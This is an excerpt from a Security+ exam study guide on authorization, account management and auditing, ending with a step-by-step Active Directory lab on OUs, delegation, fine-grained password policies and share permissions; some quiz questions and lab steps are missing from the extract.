to a user. The user inherits access rights from the group account to which he or she
belongs. A user can be a member of multiple groups and can, therefore, receive rights
and permissions from several sources.
Determining effective permissions when those set from different accounts conflict can
be a complex task. Generally, a user will have the most effective allow permissions
from all the accounts to which he or she belongs but deny permissions (where the
right to exercise a privilege is explicitly denied rather than just not granted) override
allow permissions. Some of these complexities can be dealt with by implementing a
role-based access control model.
ROLE-BASED MANAGEMENT
An ordinary group may have members that perform different roles. This is self-
evidently true of the two default groups in Windows (Users and Administrators), for
example. Most network administrators define groups that are targeted on job
functions a bit more tightly, but the principle of group management is still that groups
are accretions of users. A role is a type of group where all the members perform the
same function. Effectively, it means that there are more restrictive rules surrounding
group membership. This is likely to require the creation of more groups than would be
the case with ordinary group management, but allows fine-grained control over rights.
Another feature of a well-designed role-based access system is that a user is only
granted the access rights of a given role for the time that he or she actually performs
that role. Logically, a user can only have the rights for one role at a time. RBAC also
includes the idea of restricting what tasks users can perform within an application. A
limited example of this can be seen in Microsoft Word, which allows restrictions to be
placed on word processing functions based on group membership.
If a role-based system cannot be enforced, one alternative is to provision employees
with multiple accounts. A common use case for multiple accounts is for system
administrators who have a user level account with typical user privileges for daily work
such as preparing documents, using the Internet, and sending email; and an
administrator-level account to use only to perform system procedures such as
managing users or configuring servers. A user in this situation typically prefers to be
able to use the same environment configuration, such as Windows desktop settings,
document history, and web browser favorites lists, when switching between accounts.
The management challenge is to enable the user to be able to access the elevated
privileges of the administrative account when needed, without losing all the other
environment settings that support productivity.
as Administrator and Guest in Windows or root in Linux. Shared accounts may also be
set up for temporary staff.
A shared account breaks the principle of non-repudiation and makes an accurate audit
trail difficult to establish. It makes it more likely that the password for the account will
be compromised. The other major risk involves password changes to an account. Since
frequent password changing is a common policy, organizations will need to ensure
that everyone who has access to an account knows when the password will change,
and what that new password will be. This necessitates distributing passwords to a
large group of people, which itself poses a significant challenge to security. Shared
accounts should only be used where these risks are understood and accepted.
A guest account is a special type of shared account with no password. It allows
anonymous and unauthenticated access to a resource. The Windows OS creates guest
user and group accounts when installed, but the guest user account is disabled by
default. Guest accounts are also created when installing web services, as most web
servers allow unauthenticated access.
Note: To learn more, watch the related Video on the course website.
Activity 7-2
Discussing Access Management
Controls
SCENARIO
Answer the following questions to test your understanding of the content covered in
this topic.
It is easier for users to adjust the policy to fit changing business needs.
Centralized policies can easily become inflexible and bureaucratic.
A group is simply a container for several user objects. Any organizing principle
can be applied. In a role-based access control system, groups are tightly defined
according to job functions. Also, a user should (logically) only possess the
permissions of one role at a time.
5. In a rule-based access control model, can a subject negotiate with the data
owner for access privileges? Why or why not?
Service accounts.
Topic C
Differentiate Account Management
Practices
EXAM OBJECTIVES COVERED
4.4 Given a scenario, differentiate common account management practices.
Organizations assign accounts to users and other entities in the organization in order
to more closely manage how those entities are identified, authenticated, and
authorized in the overall IAM process. In this topic, you'll apply best practices to uphold
the security of these accounts. Account management is a specific function of IAM that
enables administrators to create, update, modify, and delete accounts and profiles that
are tied to specific identities.
DOMAIN CONTROLLERS
The Active Directory is implemented as a database stored on one or more servers
called a Domain Controller (DC). Each server configured with AD maintains a copy of
the domain database. The database is multi-master, which means that updates can be
made to any copy and replicated to the other servers.
DOMAINS
In legacy Windows networks, domains provided the primary grouping of users, groups,
and computers. The simplest AD design is a single domain, representing the entire
organization. Some organizations may require a more complex structure, however.
These can be implemented using trees and forests.
ORGANIZATIONAL UNITS
Organizational Units (OU) provide a way of dividing a domain up into different
administrative realms. You might create OUs to delegate responsibility for
administering different company departments or locations. For example, a "Sales"
department manager could be delegated control with rights to add, delete, and modify
user accounts but no rights to change account policies, such as requiring complex
passwords or managing users in the "Accounts" OU.
Using Active Directory as an example, one of the first decisions is to determine how
your AD namespace will integrate with your public DNS records. For example, you may
make the AD namespace a delegated subdomain of your public DNS domain name (for
example, ad.widget.com). This solution isolates AD from the public Internet and means
that the DNS servers supporting the public domain name (widget.com) do not need to
support Active Directory.
Note: You can simplify this for users by defining shorter explicit user principal names
(UPN), usually as the user's email address. For example, instead of asking FredB to
remember to log in as ad-widget\fredb, if FredB is configured with an explicit UPN, he
could use [email protected].
Once you have chosen how the root of the namespace will integrate with the public
DNS, you can devise how to structure AD in terms of OUs. The naming strategy for OUs
does not need to be transparent to users, as only domain administrators will
encounter it. OUs represent administrative boundaries. They allow the enterprise
administrator to delegate administrative responsibility for users and resources in
different locations or departments. Consider the following guidelines:
• Do not create too many root level containers or nest containers too deeply (no
more than five levels). Consider grouping root OUs by location or department:
• Location—if different IT departments are responsible for services in different
geographic locations.
• Department—if different IT departments are responsible for supporting different
business functions (sales and marketing, accounting, product development,
fulfilment, and so on).
• Within each root-level parent OU, use separate child OUs for different types of
objects (server computers, client computers, users, groups). Use this schema
consistently across all parent OUs.
• Separate administrative user and group accounts from standard ones.
• For each OU, document its purpose, its owner, its administrative users, the policies
that apply to it, and whether its visibility should be restricted.
When it comes to naming servers, client computers, and printer objects, there are no
standard best practices. Historically, using names from fantasy and science fiction or
popular mythology was popular. One favored modern approach is to use the
machine's service tag or asset ID. It is also often useful to denote the age of the
machine and its type (PC, laptop, or tablet, for instance). For servers, you may want to
use a prefix that denotes the server function (dc for a domain controller, exc for
Exchange, sql for SQL, and so on).
Some organizations try to encode information such as location, user, or department
into the host name. The problem with this approach is that the location, user, or
department to which the device is associated may change over time and keeping host
names "synched" could become increasingly problematic. Some organizations may use
"random" names to try to conceal the function of a machine (to make it difficult for an
attacker to identify critical servers, for instance).
Note: Use only allowed characters (as described in RFC 1123) in the namespace (A-Z, a-z,
0-9, and—[hyphen]). Names should not consist only of numbers. Also, restrict each label
to 15 characters or less to maintain compatibility with legacy Microsoft name resolution
technologies (NetBIOS names).
User account names are usually either based on the firstname.lastname format
(bob.dobbs), or a combination of first or first and second initial with lastname
(jrdobbs). Accounts should be named in a consistent manner. This helps facilitate
management of accounts, especially through scripting and command-line usage. You
should also refrain from naming accounts based on nicknames or common words so
as not to anonymize users.
Active Directory Users and Computers management tool. (Screenshot used with permission from
Microsoft.)
A new user account is created by selecting the New User option from the context
menu in Active Directory Users and Computers. If appropriate, a new user may be
copied from an existing user or template account.
There are also local users and groups stored in the computer's Security Accounts
Manager (SAM), which is part of the Registry. These accounts are managed using the
Local Users and Groups tool or, if Simple File Sharing is enabled, the User Accounts
applet in Control Panel/Windows Settings. Local accounts can only access resources
on the computer and have no permissions for Active Directory resources.
Note: Additionally, on Windows 10, Microsoft accounts can be used to sign in to the local
computer and into Microsoft's web services such as Outlook.com, OneDrive, or Office 365
simultaneously.
• Domain Local groups can be used to assign rights to resources within the same
domain only. Accounts or universal and global groups from any trusted domain can
be a member of a domain local group.
• Global groups can contain only user and global or universal group accounts from
the same domain but can be used to assign rights to resources in any trusted
domain (essentially the opposite of domain local scope).
• Universal groups can contain accounts from any trusted domain and can also be
used to grant permissions on any object in any trusted domain.
Microsoft's AGDLP (Accounts go into Global groups, which go into Domain Local
groups, which get Permissions) system recommends putting user accounts into one or
more global groups based on their role(s) within the company. The global groups are
then assigned to domain local groups, which are assigned permissions over local
resources, such as file shares and printers. This model provides scalability (in case
additional domains are added later) and security (it is simpler to audit rights for users
based on the role they have within the company).
Smaller organizations, especially those that know they will never have to support
multiple domains, may find it simpler just to use global groups and assign both users
and permissions to them. AGDLP is useful where the administrative function of
assigning users to roles is separate from the administrative function of providing
resources for each role.
Note: Don't confuse Domain Local groups with Local groups. Local groups can be
configured on servers and workstations but only apply to that same computer.
Creating a group in Windows Server. (Screenshot used with permission from Microsoft.)
LEAST PRIVILEGE
A core principle of secure access management is that of least privilege. This policy
means that a user, group, or role should be allocated the minimum sufficient
permissions to be able to perform its job function and no more. Each account should
be configured from a template of the appropriate privileges. Deviations from the
template should be monitored for increased risk.
The term privilege bracketing is used when privileges are granted only when needed,
then revoked as soon as the task is finished or the need has passed. One of the long-
standing problems with computer security is that of administrators using accounts
with elevated privileges for tasks that do not require those privileges, such as web
browsing, email, and so on. The latest versions of Windows use User Account Control
(UAC) to prevent administrative privileges from being invoked without specific
authorization. In older versions, administrators could use the Run As shortcut menu or
command line option to access administrative privileges for a particular program. UNIX
and Linux use the su or sudo commands. su could stand for "super user" or "set
user". su allows the current user to act as root and is authenticated against the root
password. sudo allows the user to perform commands configured in /etc/sudoers
and is authenticated against the user's own password.
LOCATION-BASED POLICIES
A directory such as AD can use the concepts of sites and Organizational Units (OU) to
apply different policies to users based on their location in the network. These
containers may map to physical locations or logical groups or both. Location-based
policies are also often used as a part of Network Access Control (NAC) to determine
whether access to the network itself should be granted.
good password selection and management. You might want to discuss a few
"schemes" for generating strong but easy to remember passwords, such as:
* Using selected characters from a longer phrase
* Using mathematical formulae
* Using at least one character from an extended character set (can make entering the
password more difficult, though)
Of course, the problem with organization-wide password schemes is that if an attacker
discovers the scheme, there is the possibility (perhaps remote in most environments)
that they can modify the password cracker to target that scheme. The other frustration
that is commonly encountered with schemes is that many sites do not allow users to
select strong passwords. For example, many websites only accept alphanumerics.
The following rules enforce password complexity and make them difficult to guess or
compromise:
• Length—the longer a password, the stronger it is:
• A typical strong network password should be 12-16 characters.
• A longer password or passphrase might be used for mission critical systems or
devices where logon is infrequent.
• Complexity—varying the characters in the password makes it more resistant to
dictionary-based attacks:
• No single words—better to use word and number/punctuation combinations.
• No obvious phrases in a simple form—birthday, username, job title, and so on.
• Mix upper and lowercase (assuming the software uses case-sensitive
passwords).
• Use an easily memorized phrase—underscored characters or hyphens can be
used to represent spaces if the operating system does not support these in
passwords.
• Do not write down a password or share it with other users.
Note: If users must make a note of passwords, at the very least they must keep the
note physically secure. They should also encode the password in some way. If the note
is lost or stolen it is imperative that the password be changed immediately, and the
user account closely monitored for suspicious activity.
• History and aging—change the password periodically (password aging) and do not
reuse passwords:
• User passwords should be changed every 60-90 days.
• Administrative passwords should be changed every 30 days.
• Passwords for mission critical systems should be changed every 15 days.
Note: Another concern is personal password management. A typical user might be
faced with having to remember tens of logons for different services and resort to
using the same password for each. This is unsecure, as your security becomes
dependent on the security of these other (unknown) organizations. Users must be
trained to practice good password management (at the least not to re-use work
passwords).
Configuring domain password policy using Group Policy. (Screenshot used with permission from
Microsoft.)
The following table shows the password policies that can be applied.
Policy Explanation
Minimum Password Length Passwords must be at least this many
characters.
Password must meet complexity Enforces password complexity rules (that is, no
requirements use of username within password and
combination of at least six upper/lower case
alpha-numeric and non-alpha-numeric
characters). Note that this only applies when
passwords are created or changed (existing
passwords are not tested against the policy).
Maximum password age Configures a password expiration policy. When
the time limit is reached, the user is forced to
change the password.
Enforce password history/ Specifies that a unique password must be used
Minimum password age when the user changes the password. The
system remembers up to 24 previously used
passwords, so the minimum password age must
be set to a value of 1 or greater to prevent a user
from cycling through several new passwords to
choose an old one again.
Account lockout threshold/ Specify a maximum number of incorrect logon
duration attempts within a certain period. Once the
maximum number of incorrect logons has been
reached, the server disables the account. This
prevents hackers from trying to gain system
access using lists of possible passwords.
LICENSED FOR USE ONLY BY: RAMIL · 7543944 · FEB 29 2020
Lesson 7: Managing Access Services and Accounts | Topic C
262 | The Official CompTIA® Security+® Student Guide (Exam SY0-501): 2019 Update
Policy Explanation
User cannot change password Stops the user from changing his or her account
password.
Password never expires Overrides a system password policy set to force
a regular password change.
Note: Password reuse can also mean using a work password elsewhere (on a website, for
instance). Obviously, this sort of behavior can only be policed by soft policies.
PASSWORD RECOVERY
On a domain, if a user forgets a password, an administrator can reset it. Windows local
accounts allow the user to make a password recovery disk. The user needs to
remember to update this whenever the password is changed, of course.
Note: If the user has encrypted files, a password reset will make them inaccessible. The
user will need to change the password back to the original one to regain access or the
files or key will have to be recovered by a recovery agent (as long as one has been
configured).
If the domain administrator password is forgotten, it can be reset by booting the server
in Directory Service Restore Mode (this requires knowledge of the DSRM administrator
password set when Active Directory was installed).
On the web, password recovery mechanisms are often protected either by challenge
questions or by sending a recovery link to a nominated email address or smartphone
number. Notification of changes to the account are usually automatically sent to any
previously registered email address to alert an owner of any possible misuse of the
recovery mechanism.
ACCOUNT RESTRICTIONS
To make the task of compromising the user security system harder, account
restrictions can be used. Some of these restrictions are applied through the account
properties and some are defined by GPOs.
Policy Explanation
Logon Hours Use to configure time of day restrictions. Periodically, the
server checks whether the user has the right to continue
using the network. If the user does not have the right, then
an automatic logout procedure commences.
Log on to/Allow/Deny User access can be restricted to a particular workstation or a
log on group of workstations. Conversely, a user or group account
can be denied the right to log on. Different policies can be
set for local and remote desktop logon rights.
Account Expires Setting an expiration date means that an account cannot
be used beyond a certain date. This option is useful on
accounts for temporary and contract staff.
Account is Disabled Once an account is disabled, the user is denied access to the
server until the network administrator re-enables the
account.
Note: There are many more security policy options than this, of course.
Note: To learn more, watch the related Video on the course website.
Activity 7-3
Discussing Account Management
Practices
SCENARIO
Answer the following questions to test your understanding of the content covered in
this topic.
1. What container would you use if you want to apply a different security
policy to a subset of objects within the same domain?
2. What is the process of ensuring accounts are only created for valid users,
only assigned the appropriate privileges, and that the account credentials
are known only to the valid user?
Onboarding.
3. What is the policy that states users should be allocated the minimum
sufficient permissions?
Least privilege.
More users would forget their password, try to select insecure ones, or write
them down/record them in a non-secure way (like a sticky note).
5. What is the name of the policy that prevents users from choosing old
passwords again?
Topic D
Implement Account Auditing and
Recertification
EXAM OBJECTIVES COVERED
1.6 Explain the impact associated with types of vulnerabilities.
2.3 Given a scenario, troubleshoot common security issues.
4.4 Given a scenario, differentiate common account management practices.
The last part of the AAA triad is accounting (or accountability or auditing). Accounting
means recording when and by whom a resource was accessed. Accounting is critical to
security. The purpose of accounting is to track what has happened to a resource over
time, as well as keeping a log of authorized access and edits. This can also reveal
suspicious behavior and attempts to break through security
Recording an unsuccessful attempt to take ownership of an audited folder. (Screenshot used with
permission from Microsoft.)
A user may be granted elevated privileges temporarily (escalation). In this case, some
system needs to be in place to ensure that the privileges are revoked at the end of the
agreed period.
Note: Escalation also refers to malware and attacker techniques to compromise software
vulnerabilities with the aim of obtaining elevated privileges on the system.
Determining effective permissions for a shared folder. (Screenshot used with permission from
Microsoft.)
In a mandatory access control environment, it means reviewing and testing the rules
set up to control rights assignment and auditing the labels (security clearances) applied
to users and resources.
Configuring audit entries for a folder in Windows. (Screenshot used with permission from Microsoft.)
PERMISSIONS ISSUES
Permissions issues might derive from misconfiguration, either where users don't have
the proper permissions needed to do their jobs, or where they have more permissions
than they need:
• Check for configuration changes to authorization mechanisms that support wired
and wireless networks.
• Ensure that users are in the proper groups that provide an appropriate level of
read/write access.
• Ensure that resource objects are supporting the relevant permissions to their
subjects.
• Design user permissions to adhere to the principle of least privilege.
You might also detect permissions issues from usage auditing and review:
• Ensure that users and groups are not being granted access to resources they
shouldn't have access to.
• Check the directory structure for unknown or suspicious accounts.
• Check to see if an account's privileges have been elevated beyond the intended
level. If they have, try to discover the cause (were the privileges elevated via a
configuration change, is malware involved, or is the access control system faulty?).
It is also important to review permissions when an employee leaves a company. The
employee's user account and privileges must be revoked. Depending on the security
technologies in place, it may not be appropriate to delete the account (for example,
from the perspective of recovering encrypted data), but it should be disabled. Remote
access privileges should also be revoked. If the user was privy to highly confidential
information, it may be necessary to change other accounts or security procedures. For
example, the administrative passwords on network devices, such as routers and
firewalls, might need to be changed.
AUTHENTICATION ISSUES
Most authentication issues involve users not being able to sign in. To troubleshoot this
kind of issue, complete the following checks:
• Check for configuration changes to authentication mechanisms that support wired
and wireless networks or remote access.
• Ensure that authentication servers are connected to the network and can
communicate with other resources.
• Ensure that users are given the proper access rights, and/or are placed in the
appropriate access groups.
• Check to see if the credentials the authentication mechanism accepts align with the
credentials the user presents.
• Verify that date/time settings on servers and clients are synchronized.
You must also be alert to the possibility that the authentication system has failed and
is allowing unauthorized network access. This sort of issue can only be detected by
close monitoring of network activity and logs.
UNENCRYPTED CREDENTIALS/CLEARTEXT
If a credential is ever stored or transmitted in cleartext, the account can no longer be
considered secure. The account must be re-secured as soon as this sort of policy
violation is detected, but prevention is better than cure:
• Ensure that you are using secure remote protocols like Secure Shell (SSH).
• Ensure that you are using SSL/TLS to secure communications with any compatible
protocol (HTTP, email, VoIP, FTP, and so on).
• Ensure that users know not to store passwords in unencrypted text, spreadsheet, or
database files.
• Ensure that any custom apps you develop employ encryption for data at rest, in
transit, and in use.
Activity 7-4
Discussing Accounting, Auditing, and
Recertification
SCENARIO
Answer the following questions to test your understanding of the content covered in
this topic.
A user's actions are logged on the system. Each user is associated with a unique
computer account. As long as the user's authentication is secure, they cannot
deny having performed the action.
Usage events must be recorded in a log. Choosing which events to log will be
guided by an audit policy.
Activity 7-5
Managing Accounts in a Windows
Domain
SCENARIO
In this activity, you will explore the use of different kinds of accounts for managing
objects in Active Directory and the use of GPO to apply account policies. This activity is
designed to test your understanding of and ability to apply content examples in the
following CompTIA Security+ objectives:
• 2.3 Given a scenario, troubleshoot common security issues.
• 4.3 Given a scenario, implement identity and access management controls.
• 4.4 Given a scenario, differentiate common account management practices.
d) When the program loads, select View→Select Columns. In the dialog box, check the
User Name box then select OK.
In the output, you can see the hierarchy of processes and the various containers for
user-mode processes. Kernel processes and critical services are run by SYSTEM,
whereas less-privileged services are run by either the LOCAL SERVICE or NETWORK
SERVICE accounts. User-initiated processes and services are run by the named
account (515support\Administrator in the example).
Browsing builtin account objects in Active Directory. (Screenshot used with permission from
Microsoft.)
This folder contains default security groups specific to managing Domain Controllers.
Note that these security groups are all "Domain Local" in scope. Most of the account
names are self-explanatory.
c) Select the Users folder. Note that, despite its name, this contains security groups and
user accounts. These default groups and users are for access and management of
other domain computers.
Browsing accounts in Active Directory. (Screenshot used with permission from Microsoft.)
d) Right-click the Domain Admins account and select Properties. Verify that the scope
of this account is Global. Select the Members tab. Verify that the only member is the
Administrator user account.
e)
Select the Member Of tab. Observe that the account is a member of the
Administrators locally scoped account from the Builtin folder.
This is an illustration of Microsoft's AGDLP or nested groups design principles for AD.
Security groups with directly assigned privileges should be locally scoped. User
accounts are placed in global security groups and then those groups are assigned to
locally scoped groups.
f) Select Cancel.
Viewing the SID of the current domain user—The format of SIDs can reveal a lot about the
type of account. (Screenshot used with permission from Microsoft.)
This shows the Security ID (SID) of the current domain user. Observe the ‑500 suffix.
b) In the Active Directory Users and Computers console, right-click the Administrator
account and select Properties. Select the Member Of tab and observe the
memberships. Microsoft advises trying to conceal the default Administrator account.
c) Select the General tab again and delete the text in the Description field.
d) In the First name field, type Andy and in the Last name field, type Smith. Select OK.
e) Right-click the Administrator account and select Rename. Type Andy and press
Enter.
f) Select Yes to confirm. In the Rename User dialog box, in the User logon name field,
enter Andy. Observe that the User logon name (pre-Windows 2000) field also
updates to Andy and then select OK.
Note: You can ignore it for this activity, but the same advice applies to the
Guest account.
g) Right-click the Start button and select Shut down or sign out→Sign out.
4. Tidy up the use of containers somewhat by moving the accounts that you are
actively managing into new Organizational Units (OU).
a) Press Ctrl+Alt+End and sign back in as 515support\Andy (the password is still Pa$
$w0rd).
b) In Server Manager, select Tools→Active Directory Users and Computers. Select
the Users container.
c) Right-click the corp.515support.com server icon and select New→Organizational
Unit. In the Name box, type UsersOU. Select OK.
d) Right-click the corp.515support.com server icon and select New→Organizational
Unit. In the Name box, type AdminOU. Select OK.
e) Select the Users container, and then use Ctrl+click to select the following accounts:
Domain Users, Sales, Sam, Viral. Right-click the selection and select Move. Select the
UsersOU container and select OK.
Using OUs to separate account types. (Screenshot used with permission from Microsoft.)
f) In the Users container, Ctrl+click to select the following accounts: Andy, Bobby,
Domain Admins, LocalAdmin. Right-click the selection and select Move. Select the
AdminOU container and select OK.
Note: It's too complicated to implement in this activity, but ideally you should
configure permissions on the AdminOU to prevent modification by
unauthorized administrator users. Also, it is a good idea to separate the
computer (machine) accounts into different OUs (clients, member servers, and
administrative clients, for instance).
Another Microsoft recommendation is to create a decoy Administrator account.
g) Right-click the AdminOU container and select New→User. In the New Object—User
dialog box, in the First name and User logon name fields, enter Administrator then
select Next.
h) Enter NotPa$$w0rd in the boxes then uncheck User must change password but
check Password never expires. Select Next, then Finish.
If you want to be a perfectionist about it, you should really replicate the default text in
the Description field too, but you can skip that for this activity.
i) Open a command prompt as administrator and run the following command:
whoami /user
j) Observe the -500 suffix. Now run the following command:
wmic useraccount where (name='Administrator' and
domain='515support') get sid
Note: Ignore any line break in the printed command.
Observe the SID suffix. The format of SIDs is an unchangeable "tell" that reveals the
type of an account, but these steps may help to frustrate a malicious intruder
somewhat.
For a complete list of well-known SID strings, refer to the following URL:
https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-dtyp/
81d92bba-d22b-4a8c-908a-554ab29148ab
k) Close the command prompt.
5. Even though you have renamed it, the default Administrator account is not one
that should be used for routine administration. There are lots of default group
accounts you could use, but these tend to have inappropriate privileges (such as
the right to log on to the DC). One means of creating an account with limited
permissions over a subset of network objects is to use the Delegate Control
feature.
a) In the Active Directory Users and Computers console, right-click the UsersOU
container and select Delegate Control.
b) On the first page of the wizard, select Next.
c) On the Users or Groups page, select the Add button, then type sam in the box and
select the Check Names button. Select OK.
Note: This violates the principle of only allocating permissions to groups and
not directly to user accounts, but there is only so much time to complete this
activity! This is exactly the way privilege management goes awry on a
production network, though. You need procedures to ensure that allocation of
privileges is subject to change management and oversight.
d) Select Next.
6. Group Policy is a powerful tool enabling custom user and computer settings to be
deployed to objects across Active Directory. Use the Group Policy Management
console to examine the 515 Support Local Admin Policy.
a) In Server Manager, select Tools→Group Policy Management.
LICENSED FOR USE ONLY BY: RAMIL · 7543944 · FEB 29 2020
Lesson 7: Managing Access Services and Accounts | Topic D
The Official CompTIA® Security+® Student Guide (Exam SY0-501): 2019 Update | 279
8. Use the Group Policy Modeling wizard to check that the GPOs you have defined
apply the configuration you intend.
a) In the Group Policy Management window, right-click the Group Policy Modeling
container and select Group Policy Modeling Wizard.
b) On the first page of the wizard, select Next. Select Next again to advance through the
Domain Controller Selection page.
c) On the User and Computer Selection page, under User information, select the
Container option, then select Browse and select corp. Select OK.
d) Under Computer information, select the Computer option button and enter
515support\MS1 in the box.
e) Check the Skip to the final page of this wizard without collecting additional data
check box, then select Next.
f) Select Next, then select Finish.
g) With the report selected, select the Details tab. Selectively show the relevant
selections under Computer Details→Settings→Policies to confirm that the audit
policy is applied.
Using the Group Policy Modeling Wizard. (Screenshot used with permission from
Microsoft.)
9. It is important for administrative accounts to use strong passwords, but the high
complexity requirements can be challenging for ordinary users to apply. You can
use a fine-grained password policy to configure different security requirements
for a particular group.
a) Switch to the Active Directory Users and Computers console. Right-click the
AdminOU container and select New→Group. In the Group name box, type sec-glo-
priv then select OK.
b) Select the AdminOU node. Select the Domain Admins and LocalAdmin objects, then
right-click and select Add to a group. Type sec-glo-priv then select OK. Select OK.
c) Switch to the Server Manager console then select Tools→Active Directory
Administration Center.
d) In the left-hand pane, select corp (local)→System→Password Settings Container.
e) Right-click some empty space and select New→Password Settings. Configure the
following settings:
• Name—Privileged Account Policy
• Precedence—1
• Enforce minimum password length—12 characters.
• Enforce password history—24 passwords.
• Password must meet complexity requirements—selected.
• Enforce minimum password age—1 days.
• Enforce maximum password age—28 days.
• Enforce account lockout policy—selected.
• Number of failed logon attempts allowed—3
f) Under Directly Applies To, select the Add button.
g) Type sec-glo-priv then select OK.
h) Select OK.
10. Now that you have configured some security policies and account roles, you will
use the new permissions you allocated to Sam's account to configure user and
group accounts with the aim of providing read permissions to a share for some
users and change permissions to others. You will also explore some of the
restrictions imposed by avoiding the use of an all-powerful Administrator account.
Start the other VMs, and then view the properties of the local accounts on the PC1
VM.
a) On the HOST PC, in the Hyper-V Manager console, start the MS1 VM. When the VM
has booted, start the PC1, and PC2 VMs.
b) Open a connection window for the PC1 VM. Sign in as 515support\Sam with the
password Pa$$w0rd
c) Right-click Start and select Computer Management. Expand Local Users and
Groups and select the Users container.
Local users—Note that the default accounts, Administrator and Guest, are disabled.
(Screenshot used with permission from Microsoft.)
This shows user accounts local to the computer only. These accounts cannot be used
to access domain resources.
Local groups—These are different from Domain Local groups and are scoped to the local
machine only. (Screenshot used with permission from Microsoft.)
These are the default local groups. Their scope is the local machine only.
e) Right-click the Administrators group and select Properties.
You can see the current membership of this local group, which has complete
administrative control over this machine (PC1) only. The Domain Admins group is
added automatically when a computer joins the domain. The activity setup has also
used a GPO to add a security group account named LocalAdmin. You will be making
use of this account later.
f) To test the permissions you have on the local machine, select the Add button, then
type sam and select Check Names. Select OK.
g) In the Administrators Properties dialog box, select the Apply button. Does it work?
11. The PC1 VM has the Remote Server Administration (RSAT) tools installed. This
allows a user with appropriate privileges to configure domain properties and
remote server services without logging on to the local server or DC. Clearly, the
Sam account cannot manage the DC server itself, but you only need it to be able
to manage accounts in the UsersOU container. Use these permissions to
configure some user accounts and security groups.
a) Select Start→Windows Administrative Tools→Active Directory Users and
Computers.
b) Expand the domain, then right-click the UsersOU container and select New→User. In
the New Object—User dialog box, in the First name and User logon name fields,
enter Jo then select Next.
c) Enter Pa$$w0rd in the boxes and uncheck User must change password. Select Next
then Finish.
d) Select the UsersOU container to open it then right-click the Sales object and select
Rename. Type sec-glo-sales and press Enter then select OK when prompted.
e) Right-click the sec-glo-sales object and select Properties. Observe that the group is
globally scoped. Select the Members tab and observe that the user accounts Sam
and Viral are present. Select Cancel.
f) Right-click in an empty area of the container and select New→Group.
g) In the Group name field, type sec-dlc-share-sales-change. From the Group scope
options, select Domain local. Select OK.
h) Right-click in an empty area of the container and select New→Group.
i) In the Group name field, type sec-dlc-share-sales-read. From the Group scope
options, select Domain local. Select OK.
Applying a naming convention to the creation of security groups. (Screenshot used with
permission from Microsoft.)
j) Right-click the sec-glo-sales object and select Add to a group. Type sec-dlc-share-
sales-change and select Check Names. The name should be underlined to verify that
it is a valid object in the Active Directory. Select OK. Select OK again to confirm.
k) Right-click the sec-dlc-shares-sales-read object and select Properties. Select the
Members tab then select the Add button.
l) Type Domain Users and select Check Names. The name should be underlined to
verify that it is a valid object in the Active Directory. Select OK.
m) Select OK.
You have now configured a set of permissions using nested groups to allow Domain
Users to view files but not change them and a Sales security group to change files.
Sam's account does not have permission to configure the actual file share, though.
You need to ask a colleague with local administrator privileges to do that.
12. Test the limits of the permissions allocated to the Sam user account over other
objects in Active Directory. Remember that this account was only delegated
control over the UsersOU container.
a) Select the AdminOU container. Observe that you can view the contents.
b) Right-click the Domain Admins object and select Properties. Select the Members
tab. The Add button is disabled.
c) Select Cancel.
d) Right-click the Start button and select Shut down or sign out→Sign out.
13. Use an account that has been granted local administrator privileges over all the
VMs except DC to configure a file share.
a) Open a connection window for the MS1 VM and sign in as 515support\Bobby with the
password Pa$$w0rd
b) Open the C:\ drive in File Explorer and create a new folder named SALES
c) Right-click the SALES folder and select Properties.
d) Select the Sharing tab and then select the Advanced Sharing button.
e) Check the Share this folder check box. Select the Permissions button.
14. This gives the widest possible permissions to anyone accessing the share over the
network. These can be restricted by applying NTFS permissions, however. Give the
two sales group accounts you created the appropriate read and modify
permissions.
a) Select the Security tab.
Observe that at present the object is inheriting permissions from the root folder (the
C:\ drive). You need to remove the Users group in order to set up the permissions you
actually want.
b) Select the Advanced button.
c) Select Disable inheritance and then select Convert inherited permissions into
explicit permissions on this object.
d) Select the first Users entry and then select Remove then repeat to remove the
second Users entry.
e) Select the Apply button.
f) Select the Add button. In the Permission Entry dialog box, select the Select a
principal link. Type sec-dlc-share-sales-change then select the Check Names button.
Select OK.
g) In the Permission Entry dialog box, check the Modify check box then select OK.
h) In the Advanced Security Settings dialog box, select the Add button.
i) In the Permission Entry dialog box, select the Select a principal link. Type sec-dlc-
share-sales-read then select the Check Names button. Select OK.
Configuring the share's ACL. (Screenshot used with permission from Microsoft.)
k) In the Advanced Security Settings dialog box, select the Apply button.
You should be able to see how nesting groups is making administration simpler and
less prone to error. The person configuring the share doesn't have to obtain a
complex ACL and apply it correctly. The complexity is in determining the membership
of the two domain local groups, and that is easier to audit than having to inspect the
permissions configured on the share itself.
15. If you do need to audit a share, this dialog box provides the controls to do so.
a) Select the Auditing tab, then select the Continue button.
b) Select the Add button.
c) In the Auditing Entry dialog box, select the Select a principal link. Type Everyone
then select the Check Names button. Select OK.
d) In the Permission Entry dialog box, note that the Type box is set to Success. Select
the Show advanced permissions link. Adjust the permissions so that only the
following boxes are checked:
• Create files/write data
• Delete subfolders and files
• Delete
• Change permissions
• Take ownership
j) In the Advanced Security Settings dialog box, select the Apply button.
k) Select the Effective Access tab.
This tab lets you check that you have configured permissions settings correctly.
l) Select Select a user then enter Andy and select Check Names. Select OK. Select the
View effective access button.
Determining effective access for a user account. (Screenshot used with permission from
Microsoft.)
m) Optionally, repeat to check the permissions allocated to Sam (can't change
permissions or take control), Viral (same as Sam), and Jo (read-only).
n) Select OK.
o) Select Close.
16. Optionally, if you have time test the policies you have configured.
a) Sign on to PC1 as Viral (with the Pa$$w0rd credential) and create some files in \
\MS1\SALES.
b) Sign on to PC2 as Jo (with the Pa$$w0rd credential) and verify you can view but not
add, change, or delete files in \\MS1\SALES.
c) On MS1 (as Bobby), observe the File System events in Event Viewer (Windows
Logs→Security)—are you over-logging?
d) Press Ctrl+Alt+End and try to change Bobby's password to NotPa$$w0rd—this will
be rejected (NotThePa$$w0rd should be long enough). You might also want to test
that you cannot then change the password back to Pa$$w0rd.
Summary
This lesson described the authorization and accounting components of (AAA) access
control systems.
• You should be able to describe the role of directory services and configure LDAP/
LDAPS.
• You should be able to identify the components and configuration requirements of
AAA services, such as RADIUS and TACACS+.
• Be aware of the use of federated identity management and the protocols used to
implement these systems.
• Be aware that authorization is the process of granting rights to users and that
policies such as least privilege should guide the granting of rights.
• You should be able to distinguish formal access control models and understand
how they can be applied to file system and database security.
• Make sure you can distinguish types of computer accounts and understand the
risks of shared and generic accounts.
• Be aware of the use of directory products to organize and classify accounts and of
the use of standard naming conventions.
